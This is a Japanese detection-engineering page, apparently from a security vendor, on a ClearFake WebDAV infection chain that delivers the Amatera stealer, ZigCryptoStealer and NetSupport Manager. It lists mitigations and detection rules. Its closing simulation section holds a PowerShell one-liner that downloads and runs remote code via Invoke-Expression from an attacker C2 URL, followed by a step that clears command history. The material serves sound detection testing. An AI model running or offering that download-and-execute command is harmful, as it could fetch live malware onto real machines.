ClearFake WebDAV感染チェーンがAmateraスティーラー、ZigCryptoStealer、NetSupport Managerを配信
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
ClearFakeによるキャンペーンがWebDAVとCloudflare Workersを悪用して複数のマルウェアペイロードを配布しています。主要なペイロードであるAmateraスティーラーは、認証情報と暗号通貨関連データを外部に送信するよう設計されています。追加のペイロードには、NativeAOTローダーを通じて配信されるZigCryptoStealerや、リモートアクセスを確立するために使用される無許可のNetSupport Managerインスタンスが含まれます。
調査
Cisco Talosは、ウクライナ政府機関での疑わしいWebDAVベースのDLL実行を調査しました。この分析により、2つの別個の感染チェーンが明らかになりました。一つは、 pf.ch ローダーを利用してZigCryptoStealerとGoベースのリバースプロキシを展開し、もう一つは、 verification.google ローダーを使用してNetSupport Managerをインストールします。
緩和策
組織はWebDAVおよびUNCパスからの実行を制限し、異常な rundll32.exe の動作を監視する必要があります。DLLハローリングやモジュールスタンピングなどの技術を検出するために強固なEDRコントロールを使用するべきです。また、セキュリティチームは無許可のNetSupport Managerの使用や疑わしいブロックチェーン関連のネットワーク活動を監視する必要があります。
対応
悪意のある活動が検出された場合、影響を受けたエンドポイントは追加のデータ漏洩を防ぐために直ちに隔離されるべきです。対応者はAmateraのような常駐マルウェアを特定するためにメモリーフォレンジックスを行うべきです。セキュリティチームは、WebDAVベースのDLL実行や環境全体での異常なPowerShell活動を捜索する必要があります。
攻撃フロー
この部分はまだ更新中です。
検出
疑わしいPowershell文字列(via powershell)
LOLBAS Conhost(via cmdline)
潜在的なPowershell難読化指標(via powershell)
C2チャンネルとしてのTelegram乱用の可能性(via dns_query)
異常なトップレベルドメイン(TLD)によるコマンド&コントロールの疑わしいDNSリクエスト(via dns)
検出すべきIOC(SourceIP):ClearFake WebDAV感染チェーンがAmateraスティーラー、ZigCryptoStealer、およびNetSupport Managerを配信する
検出すべきIOC(DestinationIP):ClearFake WebDAV感染チェーンがAmateraスティーラー、ZigCryptoStealer、およびNetSupport Managerを配信する
WebSocket Secureを介したC2通信とDubbedmuchを用いたデータ漏洩[プロキシ]
NetSupport ManagerのPowerShellスクリプトダウンロードと実行を検出[Windows Powershell]
WebDAV DLL実行 (rundll32.exe 経由) [Windowsプロセス作成]
シミュレーション実行
前提条件: テレメトリーとベースラインのプリフライト チェックに合格している必要があります。
根拠: このセクションでは、検出ルールをトリガーするように設計された敵の技術(TTP)の正確な実行について詳述します。コマンドと記述は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的とします。抽象的または無関係な例は、誤診につながる可能性があります。
-
攻撃のストーリー & コマンド: 敵は「ClearFake」感染チェーンをシミュレートしています。目的は、NetSupport Managerリモートアクセスツールをデプロイして、永続性とリモートコントロールを確立することです。ファイルダウンロードのシグネチャベースの検出を回避するために、攻撃者はPowerShellの「ワンライナー」を使用し、リモートC2サーバー(
https://kr.cedar2glanz.ru/jewel.js)からJavaScript/PowerShellペイロードを取得し、Invoke-Expressionを使用してメモリバッファ内で直接実行します。この技法はディスクに最小限のフットプリントを残します。 -
回帰テストスクリプト:
# シミュレーションスクリプト: ClearFake感染チェーンのペイロード実行を模倣 # 警告: このスクリプトは、アラートをトリガーするために検出ルールで定義された特定の悪意のあるURLを使用します。 $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] 悪意のあるPowerShellダウンロードと実行をシミュレートしています..." -ForegroundColor Yellow # このコマンドは、URL + IEX/Invoke-Expressionの正確なパターンを模倣します。 # URLは実際には到達できない/途切れているので、トライキャッチブロックを使用していますが、 # PROCESS COMMAND LINEはログに記録されます。 try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] コマンドが実行されました(ネットワークエラーが予想されるが、テレメトリは生成されるはずです)。" -ForegroundColor Cyan } -
クリーンアップコマンド:
# この特定のシミュレーションではファイルは作成されませんが、メモリ上の実行テストです。 # しかし、コマンド履歴をクリアしてローカルユーザーセッションからの痕跡を削除します。 Clear-History Write-Host "[+] クリーンアップ完了。ディスク上にはアーティファクトが残っていません。" -ForegroundColor Green